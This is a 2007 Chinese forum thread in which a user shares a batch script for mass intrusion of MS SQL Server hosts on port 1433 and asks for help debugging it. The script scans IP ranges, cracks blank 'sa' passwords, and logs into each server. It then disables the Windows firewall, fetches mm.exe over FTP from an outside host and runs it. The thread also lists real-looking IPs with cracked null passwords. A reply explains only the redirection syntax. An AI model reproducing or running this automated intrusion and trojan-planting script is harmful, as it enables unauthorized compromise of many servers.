Board logo

标题: 1433入侵批处理的思路 [打印本页]
作者: 91544466     时间: 2007-9-16 10:33    标题: 1433入侵批处理的思路

写在前面的话:最近砍1433批量入侵蛮火的,都是利用弱口令。所以就想自己写一个自己的工具,当然需要大家的指点,毕竟我才初出网络。

制作思路:
1.s扫描器开扫1433端口+整理IP段
2.1433弱口令扫描+整理IP段
3.漏洞利用    -------------这是本人现在遇到的关键问题,其实以前写好了,测试成功率满高。但是现在弄丢   &&&&&代码重写以后,自动传马总是出错。



备注:HSCAN进行的扫描 扫描结果在LOG文件夹下产生一个hscan.log的文本,文本如下:

59.39.7.11@mssqlscan#Cracked account:  sa/[null]
59.37.36.11@mssqlscan#Cracked account:  sa/[null]





1433.bat代码如下:请阅过的朋友指点

@echo off
color 02                     
echo                               QQ:9154446  二郎神

title 安全焦点 Xfocus.Net

echo===================================
set /p startip=请输入你要扫描的开始IP:
set /p endip=请输入你要扫描的结束IP:
set /p max=请输入扫描的线程:
echo==================================

S syn %startip% %endip% 1433 %max% /save

for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>ip.txt

hscan -f ip.txt -mssql

del result.txt
del s1.txt
del s2.txt
del ip.txt

cd log

for /f "tokens=1 delims=@" %%i in (hscan.log) do echo %%i >>ip2.txt

for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat


dir /b /s *.bat >bat.txt

for /f %%i in (bat.txt) do start %%i

del ip2.txt
del *.bat
del bat.txt
del hscan.log


以上为完整代码,关键在这一行
for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat

因为1433利用工具hscan的利用格式为sqlcmd ip user pass
我想要的结果就是%%i.bat内容为
sqlcmd ip "sa" "" < sa.txt

测试以下代码可行,
for /f %%i in (ip2.txt) do echo sqlcmd %%i "sa" "" ^< ca.txt >%%i.bat

但是我是为什么每次运行的时候他在CMD下都变成了
sqlcmd ip "sa" ""   0<ca.txt


ca.txt是ftp传马用到的文本,如下:
echo ftp www.ftp.com >ftp.txt
echo user >>ftp.txt
echo pass >>ftp.txt
echo binary >>ftp.txt
echo get mm.exe >>ftp.txt
echo bye >>ftp.txt
net stop sharedaccess
ftp -s:ftp.txt
mm.exe
mm.exe
exit
exit

大家看看 以上的代码 有什么意见给我发消息,MY QQ:9154446 +我注明来自DOS联盟论坛。
工具做好了发给大家测试:
工具更新在我的BOLG  love9154446.blog.163.com

[ Last edited by 91544466 on 2007-9-16 at 12:33 PM ]
作者: lxmxn     时间: 2007-9-16 21:29


  Quote:
但是我是为什么每次运行的时候他在CMD下都变成了
sqlcmd ip "sa" ""   0<ca.txt

< 前面的0是指的0号句柄,代表键盘输入,在批处理中可以省略书写。但是在执行批处理的时候,实际的命令应该是“sqlcmd ip "sa" ""   0<ca.txt”,所以cmd会这样显示。

试试这样的批处理:
echo something > file
执行的时候会在命令行显示

  Quote:
echo something 1> file

可以发现这里的1号句柄(标准输出StdOut)也是可以省略的。